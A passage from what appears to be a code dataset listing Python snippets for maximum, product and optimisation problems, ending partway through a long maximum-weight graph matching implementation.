i in range(2, l):\n m = min(prices[i - 1], m)\n r = max(r, prices[i] - m)\n \n return r if r >= 0 else 0", "def find_max_profit(stock_prices,k):\n\teliminated_indices = set()\n\ttotal_profit = 0\n\n\t\n\tfor i in range(0,k):\n\t\tmax_profit = float('-inf')\n\t\tmin_price = float('inf')\n\t\t\n\t\tfor current_index,current_price in enumerate(stock_prices):\n\t\t\t# This condition takes care of note by making sure that \n\t\t\t# prices are not used in previous transaction.\n\t\t\tif current_index not in eliminated_indices:\n\t\t\t\tcurrent_profit = current_price - min_price\n\n\t\t\t\tif (current_profit > max_profit):\n\t\t\t\t\tbuying_price_index = min_price_index\n\t\t\t\t\tselling_price_index = current_index\n\t\t\t\t\tmax_profit = current_profit\n\n\t\t\t\t#min_price = min(min_price, current_price)\n\t\t\t\tif (current_price < min_price):\n\t\t\t\t\tmin_price = current_price\n\t\t\t\t\tmin_price_index = current_index\n\n\n\t\t# This for loop is to take care of Note\n\t\tfor i in range(buying_price_index,selling_price_index+1):\n\t\t\teliminated_indices.add(i)\n\n\t\ttotal_profit += max_profit\n\t\tprint('buying_price_index :',buying_price_index)\n\t\tprint(\"selling_price_index :\",selling_price_index)\n\n\treturn total_profit", "def find_max(centroids):\n \n max_sim = 0.0\n max_i = 0\n max_j = 0\n length = len(centroids)\n\n for i in xrange(0, length):\n for j in xrange(i + 1, length):\n curr_sim = similarity(centroids[i], centroids[j])\n if curr_sim > max_sim:\n max_sim = curr_sim\n max_i = i\n max_j = j\n\n return (max_i, max_j, max_sim)", "def test_largest_product_2_arrays():\n assert largest_product([[1, 2], [3, 4]]) == 12", "def solve(arr):\n for i in range(len(arr) - 2, -1, -1):\n arr[i] = [max_subtriangle(arr, i, j) for j in range(len(arr[i]))]\n return arr[0][0]", "def solve(max_k=12000, min_k=2):\r\n float_inf = float('inf')\r\n min_ps_numbers = [float_inf] * (max_k - min_k + 1)\r\n\r\n for i in count(1):\r\n # I would like a better way of looking for the max than just checking to see that all values are\r\n # not inf, however this is only a minor portion of the runtime.\r\n if float_inf not in min_ps_numbers:\r\n break\r\n\r\n composite_factoring = factorint(i, multiple=True)\r\n for prod_len in range(2, len(composite_factoring) + 1):\r\n for multiplicative_partition in kbins(composite_factoring, prod_len, 0):\r\n multiplicative_partition = [prod(x) for x in multiplicative_partition]\r\n multiplicative_partition_sum = sum(multiplicative_partition)\r\n one_count = i - multiplicative_partition_sum\r\n k = one_count + len(multiplicative_partition)\r\n array_k = k - min_k\r\n if array_k < len(min_ps_numbers) and min_ps_numbers[array_k] > i:\r\n min_ps_numbers[array_k] = i\r\n\r\n return sum(set(min_ps_numbers))", "def optimal_solution_multiple_pickup(memo):\n # Calculates what the maximum value is and saves which row and [col][energy] index\n maxvalue = None\n for i in range(len(memo)+1):\n # Sets up initial value\n if maxvalue is None:\n # Sets initial value to first non empty cell[1]\n if memo[len(memo)-1][i][1] is not None:\n maxvalue = (memo[len(memo)-1][i][1], i, 1)\n # Compares first non empty cell[1] with first non empty cell[0]\n if memo[len(memo)-1][i][0] is not None:\n if maxvalue is not None:\n if memo[len(memo) - 1][i][0] > maxvalue[0]:\n maxvalue = (memo[len(memo) - 1][i][0], i, 0)\n # In case first non empty cell[1] was None\n else:\n maxvalue = (memo[len(memo) - 1][i][0], i, 0)\n # After initial value is set. 
Compares it the other value in that cell to get maximum\n else:\n if memo[len(memo)-1][i][1] is not None:\n if memo[len(memo)-1][i][1] > maxvalue[0]:\n maxvalue = (memo[len(memo)-1][i][1], i, 1)\n if memo[len(memo)-1][i][0] is not None:\n if memo[len(memo)-1][i][0] > maxvalue[0]:\n maxvalue = (memo[len(memo)-1][i][0], i, 0)\n\n # Goes back and calculates how the optimal solution was formed\n optimal_solution = [0] * len(memo)\n current_row = maxvalue[1]\n current_index = maxvalue[2]\n # Goes backwards through the array starting at the best value\n for col in range(len(memo)-1, 0, -1):\n # For energy > 0 where it has the choice to pick up or not\n if current_row > 0:\n # Checks if it did pick up. If current cell does not have the same value as the previous column with\n # 1 less energy[current_index] then it must have picked up\n if memo[col][current_row][current_index] != memo[col-1][current_row-1][1]:\n optimal_solution[col] = 1\n\n # Picks the maximum number from previous column and 1 more energy\n if memo[col-1][current_row+1][0] is None:\n current_index = 1\n elif memo[col-1][current_row+1][1] is None:\n current_index = 0\n else:\n if memo[col-1][current_row+1][0] > memo[col-1][current_row+1][1]:\n current_index = 0\n else:\n current_index = 1\n current_row += 1\n # otherwise it did not pick up\n else:\n current_row -= 1\n current_index = 1\n # If at 0 energy then it must have picked up\n else:\n optimal_solution[col] = 1\n current_row += 1\n if memo[col - 1][1][0] is None:\n current_index = 1\n elif memo[col - 1][1][1] is None:\n current_index = 0\n else:\n if memo[col - 1][1][0] > memo[col - 1][1][1]:\n current_index = 0\n else:\n current_index = 1\n return maxvalue[0], optimal_solution", "def findMax2d(x):\n m, n = x.shape \n x_ = x.ravel()\n idx = np.argmax(x_)\n i = idx // n \n j = idx % n \n return i, j", "def findHighestPkPair(x, pkp): #{\n vrbMsg(5, 'findHighestPkPair() x = [...], pkp = ' + str(pkp))\n mi = [0,0]\n mv = x[pkp[0]]\n for i in range(1, len(pkp)): #{\n nv = x[pkp[i]]\n if(nv > mv): #{\n mi[0] = i\n mv = nv\n #}\n #}\n mv = None\n for i in range(0, len(pkp)): #{\n if(i != mi[0]): #{\n nv = x[pkp[i]]\n if((mv is None) or (nv > mv)): #{\n mi[1] = i\n mv = nv\n #}\n #}\n #}\n if(mi[0] == mi[1]): #{\n mi = [mi[0]]\n elif(mi[0] > mi[1]): #{\n mi = [mi[1], mi[0]]\n #}\n vrbMsg(5, 'findHighestPkPair() mi = ' + str(mi))\n return mi", "def find_max_distance(l):\n\tcomb = list(combinations(list(range(1, len(l))), 2))\n\tx, y, max_distance = 0, 0, 0\n\n\tfor i,j in comb:\n\t\tif np.sum(np.abs(l[i]-l[j])) > max_distance:\n\t\t\tx, y, max_distance = i, j, np.sum(np.abs(l[i]-l[j]))\n\treturn x, y, max_distance", "def compute(self, node, input_vals):\r\n #start = time.time()\r\n\r\n #assert len(input_vals) == 1\r\n strides = node.const_attr[1]\r\n ksize = node.const_attr[0]\r\n ish = list(input_vals[0].shape)\r\n input = input_vals[0]\r\n output = np.zeros([ish[0],(ish[1]-ksize[1])//strides[1]+1,(ish[2]-ksize[2])//strides[2]+1,ish[3]])\r\n osh = output.shape\r\n #print(osh)\r\n for i in range(osh[1]):\r\n for j in range(osh[2]):\r\n output[:,i,j,:] = np.amax(input[:,i*strides[1]:(i+1)*strides[1],j*strides[1]:(j+1)*strides[1],:],axis=(1,2))\r\n #end = time.time() \r\n #print(\"max_pool\") \r\n #print(end - start) \r\n return output\r\n \r\n #assert False\r", "def max_pairs(shape):\n\n if not isinstance(shape, (tuple, list)):\n x = get_length(shape)\n n = int(x * (x - 1) / 2)\n\n elif isinstance(shape, (tuple, list)) and len(shape) == 1:\n x = get_length(shape[0])\n n = int(x * (x - 
1) / 2)\n\n else:\n n = numpy.prod([get_length(xi) for xi in shape])\n\n return n", "def find_max_triples(st_prob, ed_prob, top_n=5, prob_thd=None, tensor_type=\"torch\"):\n if tensor_type == \"torch\":\n st_prob, ed_prob = st_prob.data.numpy(), ed_prob.data.numpy()\n product = np.einsum(\"bm,bn->bmn\", st_prob, ed_prob)\n # (N, L, L) the lower part becomes zeros, start_idx < ed_idx\n upper_product = np.triu(product, k=1)\n return find_max_triples_from_upper_triangle_product(upper_product, top_n=top_n, prob_thd=prob_thd)", "def test_computes_max_nth_digit_by_multiples_of_two(self):\t\t\n\t\tself.assertEqual(64, products_of_multiplied_nth_digits(20, 2))", "def find_optimal_strategy(prices, max_position=3, cost_per_trade=0.02):\n buy_price = np.maximum(prices.bid_price, prices.ask_price).values\n sell_price = np.minimum(prices.bid_price, prices.ask_price).values\n\n account = np.full((prices.shape[0] + 1, 2 * max_position + 3), -np.inf)\n account[0, max_position + 1] = 0\n\n actions = np.empty((prices.shape[0], 2 * max_position + 3), dtype=int)\n\n for i in range(prices.shape[0]):\n for j in range(1, account.shape[1] - 1):\n buy = account[i, j - 1] - cost_per_trade - buy_price[i]\n sell = account[i, j + 1] - cost_per_trade + sell_price[i]\n hold = account[i, j]\n if buy > sell and buy > hold:\n account[i + 1, j] = buy\n actions[i, j] = 1\n elif sell > buy and sell > hold:\n account[i + 1, j] = sell\n actions[i, j] = -1\n else:\n account[i + 1, j] = hold\n actions[i, j] = 0\n\n pnl = account[-1, 1:-1] + (np.arange(-max_position, max_position + 1) *\n prices.market_price.iloc[-1])\n j = np.argmax(pnl) + 1\n optimal_sequence = []\n for i in reversed(range(actions.shape[0])):\n optimal_sequence.append(actions[i, j])\n j -= actions[i, j]\n optimal_sequence = np.array(list(reversed(optimal_sequence)))\n\n return optimal_sequence, np.max(pnl) / optimal_sequence.size", "def getOptimalSolution(self):\n max_index = np.argmax(self.Ws)\n self.Wmax = self.Ws[max_index]\n self.Emax = self.subsets[max_index]\n return (self.Wmax, self.Emax)", "def find_pair(numbers, target_sum):\n for num in numbers:\n partner_num = target_sum - num\n if partner_num in numbers:\n return num * partner_num", "def greatest_adjacent_product(target, window):\n stringified = str(target)\n length = len(stringified)\n greatest_product = None\n\n for i in range(length):\n digits = stringified[i:i+window]\n\n # Stop if we've reached the end of the target.\n if len(digits) < window:\n break\n\n product = int(digits[0])\n for digit in digits[1:]:\n product *= int(digit)\n\n if greatest_product is None or product > greatest_product:\n greatest_product = product\n\n return greatest_product", "def _max_bits_used_in_function_in_round():\n word_size = 16\n bits_occupied = [word_size] * len(cost_functions)\n for (pa, pb) in all_possible_pairs:\n for i in range(len(cost_functions)):\n max_sum_of_cost = num_pairings_in_round * \\\n cost_functions[i](pa, pb)\n while (max_sum_of_cost >= 2**bits_occupied[i]):\n bits_occupied[i] *= 2\n bits_occupied = [2*b for b in bits_occupied] # Paranoia\n for b in bits_occupied:\n assert(b % word_size == 0)\n return max(bits_occupied)", "def solve():\n result = 1\n map = dict()\n for x in range(2, 20):\n temp = prime_factors(x)\n for n in range(2, 20):\n if n in temp:\n if n in map:\n map[n] = max(temp.count(n), map[n])\n else:\n map[n] = temp.count(n)\n\n for x in map:\n result *= (x ** map[x])\n\n return result", "def problem9_naive(n):\n for a in range(4, n, 4):\n for b in range(3, n - a):\n c = n - a - b\n 
if a ** 2 + b ** 2 == c ** 2:\n return a * b * c\n return None", "def main():\n largest = 0\n for i in range(100, 999):\n for j in range(100, 999):\n if i * j > largest and is_palindrome(i * j):\n largest = i * j\n\n print \"The largest palindrome product of two 3-digits nums is %d \" % largest", "def largest_n_adjacent_product(fname, n):\n with open(fname, \"r\") as f:\n s = \"\"\n for line in f:\n s += line[:-1]\n \n largest = 0\n for i in range(1000 - (n-1)):\n adj_n = s[i:i+n]\n product = 1\n for j in adj_n:\n product *= int(j)\n if product > largest:\n largest = product\n return largest", "def test_largest_product_one_array():\n assert largest_product([[1, 2]]) == 2", "def getmulticombos(peeps):\n\n\tret = []\n\n\tfor p in peeps:\n\t\tu,s = getcombos(p)\n\n\t\tbestu = getbesttriplet(u)\n\t\tbests = getbesttriplet(s)\n\n\t\tret.append((bestu, bests))\n\n\treturn ret", "def largestProductInSeries(string : str,length:int):\n \n greatest_prod = -sys.maxsize -1\n greatest_prod_digits = \"\"\n for i in range(len(string)-length-1):\n prod_digits = \"\"\n product = 1\n for j in range(length):\n digit = int(string[i+j])\n prod_digits = prod_digits+str(digit)\n product *= digit\n \n print(greatest_prod_digits+\" \"+str(product))\n \n if product > greatest_prod :\n greatest_prod = product\n greatest_prod_digits = prod_digits\n\n return (greatest_prod_digits,greatest_prod)", "def pool(x):\n return F.max_pool2d(x, 2, 2)", "def get_max_sum4(a):\n return max(get_max_sum2(a), 0)", "def main():\n limit = 1000\n max_primes = 0\n max_b, max_c = 0, 0\n is_prime = sieve_of_eratosthenes_bool(limit * 100)\n primes = sieve_of_eratosthenes(limit)\n for c in primes:\n for b in range(-c, limit, 2):\n for n in count(1):\n res = n * n + b * n + c\n if res < 1 or not is_prime[res]:\n if max_primes < n:\n max_primes = n\n max_b, max_c = b, c\n print(max_primes, max_b, max_c, end='\\n')\n break\n print(max_b, max_c, max_b * max_c)", "def maxWeightMatching(edges, maxcardinality=False):\r\n\r\n #\r\n # Vertices are numbered 0 .. (nvertex-1).\r\n # Non-trivial blossoms are numbered nvertex .. (2*nvertex-1)\r\n #\r\n # Edges are numbered 0 .. (nedge-1).\r\n # Edge endpoints are numbered 0 .. 
(2*nedge-1), such that endpoints\r\n # (2*k) and (2*k+1) both belong to edge k.\r\n #\r\n # Many terms used in the comments (sub-blossom, T-vertex) come from\r\n # the paper by Galil; read the paper before reading this code.\r\n #\r\n\r\n # Python 2/3 compatibility.\r\n from sys import version as sys_version\r\n if sys_version < '3':\r\n integer_types = (int, long)\r\n else:\r\n integer_types = (int,)\r\n\r\n # Deal swiftly with empty graphs.\r\n if not edges:\r\n return [ ]\r\n\r\n # Count vertices.\r\n nedge = len(edges)\r\n nvertex = 0\r\n for (i, j, w) in edges:\r\n assert i >= 0 and j >= 0 #and i != j\r\n if i >= nvertex:\r\n nvertex = i + 1\r\n if j >= nvertex:\r\n nvertex = j + 1\r\n\r\n # Find the maximum edge weight.\r\n maxweight = max(0, max([ wt for (i, j, wt) in edges ]))\r\n\r\n # If p is an edge endpoint,\r\n # endpoint[p] is the vertex to which endpoint p is attached.\r\n # Not modified by the algorithm.\r\n endpoint = [ edges[p//2][p%2] for p in range(2*nedge) ]\r\n\r\n # If v is a vertex,\r\n # neighbend[v] is the list of remote endpoints of the edges attached to v.\r\n # Not modified by the algorithm.\r\n neighbend = [ [ ] for i in range(nvertex) ]\r\n for k in range(len(edges)):\r\n (i, j, w) = edges[k]\r\n neighbend[i].append(2*k+1)\r\n neighbend[j].append(2*k)\r\n\r\n # If v is a vertex,\r\n # mate[v] is the remote endpoint of its matched edge, or -1 if it is single\r\n # (i.e. endpoint[mate[v]] is v's partner vertex).\r\n # Initially all vertices are single; updated during augmentation.\r\n mate = nvertex * [ -1 ]\r\n\r\n # If b is a top-level blossom,\r\n # label[b] is 0 if b is unlabeled (free);\r\n # 1 if b is an S-vertex/blossom;\r\n # 2 if b is a T-vertex/blossom.\r\n # The label of a vertex is found by looking at the label of its\r\n # top-level containing blossom.\r\n # If v is a vertex inside a T-blossom,\r\n # label[v] is 2 iff v is reachable from an S-vertex outside the blossom.\r\n # Labels are assigned during a stage and reset after each augmentation.\r\n label = (2 * nvertex) * [ 0 ]\r\n\r\n # If b is a labeled top-level blossom,\r\n # labelend[b] is the remote endpoint of the edge through which b obtained\r\n # its label, or -1 if b's base vertex is single.\r\n # If v is a vertex inside a T-blossom and label[v] == 2,\r\n # labelend[v] is the remote endpoint of the edge through which v is\r\n # reachable from outside the blossom.\r\n labelend = (2 * nvertex) * [ -1 ]\r\n\r\n # If v is a vertex,\r\n # inblossom[v] is the top-level blossom to which v belongs.\r\n # If v is a top-level vertex, v is itself a blossom (a trivial blossom)\r\n # and inblossom[v] == v.\r\n # Initially all vertices are top-level trivial blossoms.\r\n inblossom = list(range(nvertex))\r\n\r\n # If b is a sub-blossom,\r\n # blossomparent[b] is its immediate parent (sub-)blossom.\r\n # If b is a top-level blossom, blossomparent[b] is -1.\r\n blossomparent = (2 * nvertex) * [ -1 ]\r\n\r\n # If b is a non-trivial (sub-)blossom,\r\n # blossomchilds[b] is an ordered list of its sub-blossoms, starting with\r\n # the base and going round the blossom.\r\n blossomchilds = (2 * nvertex) * [ None ]\r\n\r\n # If b is a (sub-)blossom,\r\n # blossombase[b] is its base VERTEX (i.e. 
recursive sub-blossom).\r\n blossombase = list(range(nvertex)) + nvertex * [ -1 ]\r\n\r\n # If b is a non-trivial (sub-)blossom,\r\n # blossomendps[b] is a list of endpoints on its connecting edges,\r\n # such that blossomendps[b][i] is the local endpoint of blossomchilds[b][i]\r\n # on the edge that connects it to blossomchilds[b][wrap(i+1)].\r\n blossomendps = (2 * nvertex) * [ None ]\r\n\r\n # If v is a free vertex (or an unreached vertex inside a T-blossom),\r\n # bestedge[v] is the edge to an S-vertex with least slack,\r\n # or -1 if there is no such edge.\r\n # If b is a (possibly trivial) top-level S-blossom,\r\n # bestedge[b] is the least-slack edge to a different S-blossom,\r\n # or -1 if there is no such edge.\r\n # This is used for efficient computation of delta2 and delta3.\r\n bestedge = (2 * nvertex) * [ -1 ]\r\n\r\n # If b is a non-trivial top-level S-blossom,\r\n # blossombestedges[b] is a list of least-slack edges to neighbouring\r\n # S-blossoms, or None if no such list has been computed yet.\r\n # This is used for efficient computation of delta3.\r\n blossombestedges = (2 * nvertex) * [ None ]\r\n\r\n # List of currently unused blossom numbers.\r\n unusedblossoms = list(range(nvertex, 2*nvertex))\r\n\r\n # If v is a vertex,\r\n # dualvar[v] = 2 * u(v) where u(v) is the v's variable in the dual\r\n # optimization problem (multiplication by two ensures integer values\r\n # throughout the algorithm if all edge weights are integers).\r\n # If b is a non-trivial blossom,\r\n # dualvar[b] = z(b) where z(b) is b's variable in the dual optimization\r\n # problem.\r\n dualvar = nvertex * [ maxweight ] + nvertex * [ 0 ]\r\n\r\n # If allowedge[k] is true, edge k has zero slack in the optimization\r\n # problem; if allowedge[k] is false, the edge's slack may or may not\r\n # be zero.\r\n allowedge = nedge * [ False ]\r\n\r\n # Queue of newly discovered S-vertices.\r\n queue = [ ]\r\n\r\n # Return 2 * slack of edge k (does not work inside blossoms).\r\n def slack(k):\r\n (i, j, wt) = edges[k]\r\n return dualvar[i] + dualvar[j] - 2 * wt\r\n\r\n # Generate the leaf vertices of a blossom.\r\n def blossomLeaves(b):\r\n if b < nvertex:\r\n yield b\r\n else:\r\n for t in blossomchilds[b]:\r\n if t < nvertex:\r\n yield t\r\n else:\r\n for v in blossomLeaves(t):\r\n yield v\r\n\r\n # Assign label t to the top-level blossom containing vertex w\r\n # and record the fact that w was reached through the edge with\r\n # remote endpoint p.\r\n def assignLabel(w, t, p):\r\n if DEBUG: DEBUG('assignLabel(%d,%d,%d)' % (w, t, p))\r\n b = inblossom[w]\r\n assert label[w] == 0 and label[b] == 0\r\n label[w] = label[b] = t\r\n labelend[w] = labelend[b] = p\r\n bestedge[w] = bestedge[b] = -1\r\n if t == 1:\r\n # b became an S-vertex/blossom; add it(s vertices) to the queue.\r\n queue.extend(blossomLeaves(b))\r\n if DEBUG: DEBUG('PUSH ' + str(list(blossomLeaves(b))))\r\n elif t == 2:\r\n # b became a T-vertex/blossom; assign label S to its mate.\r\n # (If b is a non-trivial blossom, its base is the only vertex\r\n # with an external mate.)\r\n base = blossombase[b]\r\n assert mate[base] >= 0\r\n assignLabel(endpoint[mate[base]], 1, mate[base] ^ 1)\r\n\r\n # Trace back from vertices v and w to discover either a new blossom\r\n # or an augmenting path. 
Return the base vertex of the new blossom or -1.\r\n def scanBlossom(v, w):\r\n if DEBUG: DEBUG('scanBlossom(%d,%d)' % (v, w))\r\n # Trace back from v and w, placing breadcrumbs as we go.\r\n path = [ ]\r\n base = -1\r\n while v != -1 or w != -1:\r\n # Look for a breadcrumb in v's blossom or put a new breadcrumb.\r\n b = inblossom[v]\r\n if label[b] & 4:\r\n base = blossombase[b]\r\n break\r\n assert label[b] == 1\r\n path.append(b)\r\n label[b] = 5\r\n # Trace one step back.\r\n assert labelend[b] == mate[blossombase[b]]\r\n if labelend[b] == -1:\r\n # The base of blossom b is single; stop tracing this path.\r\n v = -1\r\n else:\r\n v = endpoint[labelend[b]]\r\n b = inblossom[v]\r\n assert label[b] == 2\r\n # b is a T-blossom; trace one more step back.\r\n assert labelend[b] >= 0\r\n v = endpoint[labelend[b]]\r\n # Swap v and w so that we alternate between both paths.\r\n if w != -1:\r\n v, w = w, v\r\n # Remove breadcrumbs.\r\n for b in path:\r\n label[b] = 1\r\n # Return base vertex, if we found one.\r\n return base\r\n\r\n # Construct a new blossom with given base, containing edge k which\r\n # connects a pair of S vertices. Label the new blossom as S; set its dual\r\n # variable to zero; relabel its T-vertices to S and add them to the queue.\r\n def addBlossom(base, k):\r\n (v, w, wt) = edges[k]\r\n bb = inblossom[base]\r\n bv = inblossom[v]\r\n bw = inblossom[w]\r\n # Create blossom.\r\n b = unusedblossoms.pop()\r\n if DEBUG: DEBUG('addBlossom(%d,%d) (v=%d w=%d) -> %d' % (base, k, v, w, b))\r\n blossombase[b] = base\r\n blossomparent[b] = -1\r\n blossomparent[bb] = b\r\n # Make list of sub-blossoms and their interconnecting edge endpoints.\r\n blossomchilds[b] = path = [ ]\r\n blossomendps[b] = endps = [ ]\r\n # Trace back from v to base.\r\n while bv != bb:\r\n # Add bv to the new blossom.\r\n blossomparent[bv] = b\r\n path.append(bv)\r\n endps.append(labelend[bv])\r\n assert (label[bv] == 2 or\r\n (label[bv] == 1 and labelend[bv] == mate[blossombase[bv]]))\r\n # Trace one step back.\r\n assert labelend[bv] >= 0\r\n v = endpoint[labelend[bv]]\r\n bv = inblossom[v]\r\n # Reverse lists, add endpoint that connects the pair of S vertices.\r\n path.append(bb)\r\n path.reverse()\r\n endps.reverse()\r\n endps.append(2*k)\r\n # Trace back from w to base.\r\n while bw != bb:\r\n # Add bw to the new blossom.\r\n blossomparent[bw] = b\r\n path.append(bw)\r\n endps.append(labelend[bw] ^ 1)\r\n assert (label[bw] == 2 or\r\n (label[bw] == 1 and labelend[bw] == mate[blossombase[bw]]))\r\n # Trace one step back.\r\n assert labelend[bw] >= 0\r\n w = endpoint[labelend[bw]]\r\n bw = inblossom[w]\r\n # Set label to S.\r\n assert label[bb] == 1\r\n label[b] = 1\r\n labelend[b] = labelend[bb]\r\n # Set dual variable to zero.\r\n dualvar[b] = 0\r\n # Relabel vertices.\r\n for v in blossomLeaves(b):\r\n if label[inblossom[v]] == 2:\r\n # This T-vertex now turns into an S-vertex because it becomes\r\n # part of an S-blossom; add it to the queue.\r\n queue.append(v)\r\n inblossom[v] = b\r\n # Compute blossombestedges[b].\r\n bestedgeto = (2 * nvertex) * [ -1 ]\r\n for bv in path:\r\n if blossombestedges[bv] is None:\r\n # This subblossom does not have a list of least-slack edges;\r\n # get the information from the vertices.\r\n nblists = [ [ p // 2 for p in neighbend[v] ]\r\n for v in blossomLeaves(bv) ]\r\n else:\r\n # Walk this subblossom's least-slack edges.\r\n nblists = [ blossombestedges[bv] ]\r\n for nblist in nblists:\r\n for k in nblist:\r\n (i, j, wt) = edges[k]\r\n if inblossom[j] == b:\r\n i, j = 
j, i\r\n bj = inblossom[j]\r\n if (bj != b and label[bj] == 1 and\r\n (bestedgeto[bj] == -1 or\r\n slack(k) < slack(bestedgeto[bj]))):\r\n bestedgeto[bj] = k\r\n # Forget about least-slack edges of the subblossom.\r\n blossombestedges[bv] = None\r\n bestedge[bv] = -1\r\n blossombestedges[b] = [ k for k in bestedgeto if k != -1 ]\r\n # Select bestedge[b].\r\n bestedge[b] = -1\r\n for k in blossombestedges[b]:\r\n if bestedge[b] == -1 or slack(k) < slack(bestedge[b]):\r\n bestedge[b] = k\r\n if DEBUG: DEBUG('blossomchilds[%d]=' % b + repr(blossomchilds[b]))\r\n\r\n # Expand the given top-level blossom.\r\n def expandBlossom(b, endstage):\r\n if DEBUG: DEBUG('expandBlossom(%d,%d) %s' % (b, endstage, repr(blossomchilds[b])))\r\n # Convert sub-blossoms into top-level blossoms.\r\n for s in blossomchilds[b]:\r\n blossomparent[s] = -1\r\n if s < nvertex:\r\n inblossom[s] = s\r\n elif endstage and dualvar[s] == 0:\r\n # Recursively expand this sub-blossom.\r\n expandBlossom(s, endstage)\r\n else:\r\n for v in blossomLeaves(s):\r\n inblossom[v] = s\r\n # If we expand a T-blossom during a stage, its sub-blossoms must be\r\n # relabeled.\r\n if (not endstage) and label[b] == 2:\r\n # Start at the sub-blossom through which the expanding\r\n # blossom obtained its label, and relabel sub-blossoms untili\r\n # we reach the base.\r\n # Figure out through which sub-blossom the expanding blossom\r\n # obtained its label initially.\r\n assert labelend[b] >= 0\r\n entrychild = inblossom[endpoint[labelend[b] ^ 1]]\r\n # Decide in which direction we will go round the blossom.\r\n j = blossomchilds[b].index(entrychild)\r\n if j & 1:\r\n # Start index is odd; go forward and wrap.\r\n j -= len(blossomchilds[b])\r\n jstep = 1\r\n endptrick = 0\r\n else:\r\n # Start index is even; go backward.\r\n jstep = -1\r\n endptrick = 1\r\n # Move along the blossom until we get to the base.\r\n p = labelend[b]\r\n while j != 0:\r\n # Relabel the T-sub-blossom.\r\n label[endpoint[p ^ 1]] = 0\r\n label[endpoint[blossomendps[b][j-endptrick]^endptrick^1]] = 0\r\n assignLabel(endpoint[p ^ 1], 2, p)\r\n # Step to the next S-sub-blossom and note its forward endpoint.\r\n allowedge[blossomendps[b][j-endptrick]//2] = True\r\n j += jstep\r\n p = blossomendps[b][j-endptrick] ^ endptrick\r\n # Step to the next T-sub-blossom.\r\n allowedge[p//2] = True\r\n j += jstep\r\n # Relabel the base T-sub-blossom WITHOUT stepping through to\r\n # its mate (so don't call assignLabel).\r\n bv = blossomchilds[b][j]\r\n label[endpoint[p ^ 1]] = label[bv] = 2\r\n labelend[endpoint[p ^ 1]] = labelend[bv] = p\r\n bestedge[bv] = -1\r\n # Continue along the blossom until we get back to entrychild.\r\n j += jstep\r\n while blossomchilds[b][j] != entrychild:\r\n # Examine the vertices of the sub-blossom to see whether\r\n # it is reachable from a neighbouring S-vertex outside the\r\n # expanding blossom.\r\n bv = blossomchilds[b][j]\r\n if label[bv] == 1:\r\n # This sub-blossom just got label S through one of its\r\n # neighbours; leave it.\r\n j += jstep\r\n continue\r\n for v in blossomLeaves(bv):\r\n if label[v] != 0:\r\n break\r\n # If the sub-blossom contains a reachable vertex, assign\r\n # label T to the sub-blossom.\r\n if label[v] != 0:\r\n assert label[v] == 2\r\n assert inblossom[v] == bv\r\n label[v] = 0\r\n label[endpoint[mate[blossombase[bv]]]] = 0\r\n assignLabel(v, 2, labelend[v])\r\n j += jstep\r\n # Recycle the blossom number.\r\n label[b] = labelend[b] = -1\r\n blossomchilds[b] = blossomendps[b] = None\r\n blossombase[b] = -1\r\n 
blossombestedges[b] = None\r\n bestedge[b] = -1\r\n unusedblossoms.append(b)\r\n\r\n # Swap matched/unmatched edges over an alternating path through blossom b\r\n # between vertex v and the base vertex. Keep blossom bookkeeping consistent.\r\n def augmentBlossom(b, v):\r\n if DEBUG: DEBUG('augmentBlossom(%d,%d)' % (b, v))\r\n # Bubble up through the blossom tree from vertex v to an immediate\r\n # sub-blossom of b.\r\n t = v\r\n while blossomparent[t] != b:\r\n t = blossomparent[t]\r\n # Recursively deal with the first sub-blossom.\r\n if t >= nvertex:\r\n augmentBlossom(t, v)\r\n # Decide in which direction we will go round the blossom.\r\n i = j = blossomchilds[b].index(t)\r\n if i & 1:\r\n # Start index is odd; go forward and wrap.\r\n j -= len(blossomchilds[b])\r\n jstep = 1\r\n endptrick = 0\r\n else:\r\n # Start index is even; go backward.\r\n jstep = -1\r\n endptrick = 1\r\n # Move along the blossom until we get to the base.\r\n while j != 0:\r\n # Step to the next sub-blossom and augment it recursively.\r\n j += jstep\r\n t = blossomchilds[b][j]\r\n p = blossomendps[b][j-endptrick] ^ endptrick\r\n if t >= nvertex:\r\n augmentBlossom(t, endpoint[p])\r\n # Step to the next sub-blossom and augment it recursively.\r\n j += jstep\r\n t = blossomchilds[b][j]\r\n if t >= nvertex:\r\n augmentBlossom(t, endpoint[p ^ 1])\r\n # Match the edge connecting those sub-blossoms.\r\n mate[endpoint[p]] = p ^ 1\r\n mate[endpoint[p ^ 1]] = p\r\n if DEBUG: DEBUG('PAIR %d %d (k=%d)' % (endpoint[p], endpoint[p^1], p//2))\r\n # Rotate the list of sub-blossoms to put the new base at the front.\r\n blossomchilds[b] = blossomchilds[b][i:] + blossomchilds[b][:i]\r\n blossomendps[b] = blossomendps[b][i:] + blossomendps[b][:i]\r\n blossombase[b] = blossombase[blossomchilds[b][0]]\r\n assert blossombase[b] == v\r\n\r\n # Swap matched/unmatched edges over an alternating path between two\r\n # single vertices. The augmenting path runs through edge k, which\r\n # connects a pair of S vertices.\r\n def augmentMatching(k):\r\n (v, w, wt) = edges[k]\r\n if DEBUG: DEBUG('augmentMatching(%d) (v=%d w=%d)' % (k, v, w))\r\n if DEBUG: DEBUG('PAIR %d %d (k=%d)' % (v, w, k))\r\n for (s, p) in ((v, 2*k+1), (w, 2*k)):\r\n # Match vertex s to remote endpoint p. 
Then trace back from s\r\n # until we find a single vertex, swapping matched and unmatched\r\n # edges as we go.\r\n while 1:\r\n bs = inblossom[s]\r\n assert label[bs] == 1\r\n assert labelend[bs] == mate[blossombase[bs]]\r\n # Augment through the S-blossom from s to base.\r\n if bs >= nvertex:\r\n augmentBlossom(bs, s)\r\n # Update mate[s]\r\n mate[s] = p\r\n # Trace one step back.\r\n if labelend[bs] == -1:\r\n # Reached single vertex; stop.\r\n break\r\n t = endpoint[labelend[bs]]\r\n bt = inblossom[t]\r\n assert label[bt] == 2\r\n # Trace one step back.\r\n assert labelend[bt] >= 0\r\n s = endpoint[labelend[bt]]\r\n j = endpoint[labelend[bt] ^ 1]\r\n # Augment through the T-blossom from j to base.\r\n assert blossombase[bt] == t\r\n if bt >= nvertex:\r\n augmentBlossom(bt, j)\r\n # Update mate[j]\r\n mate[j] = labelend[bt]\r\n # Keep the opposite endpoint;\r\n # it will be assigned to mate[s] in the next step.\r\n p = labelend[bt] ^ 1\r\n if DEBUG: DEBUG('PAIR %d %d (k=%d)' % (s, t, p//2))\r\n\r\n # Verify that the optimum solution has been reached.\r\n def verifyOptimum():\r\n if maxcardinality:\r\n # Vertices may have negative dual;\r\n # find a constant non-negative number to add to all vertex duals.\r\n vdualoffset = max(0, 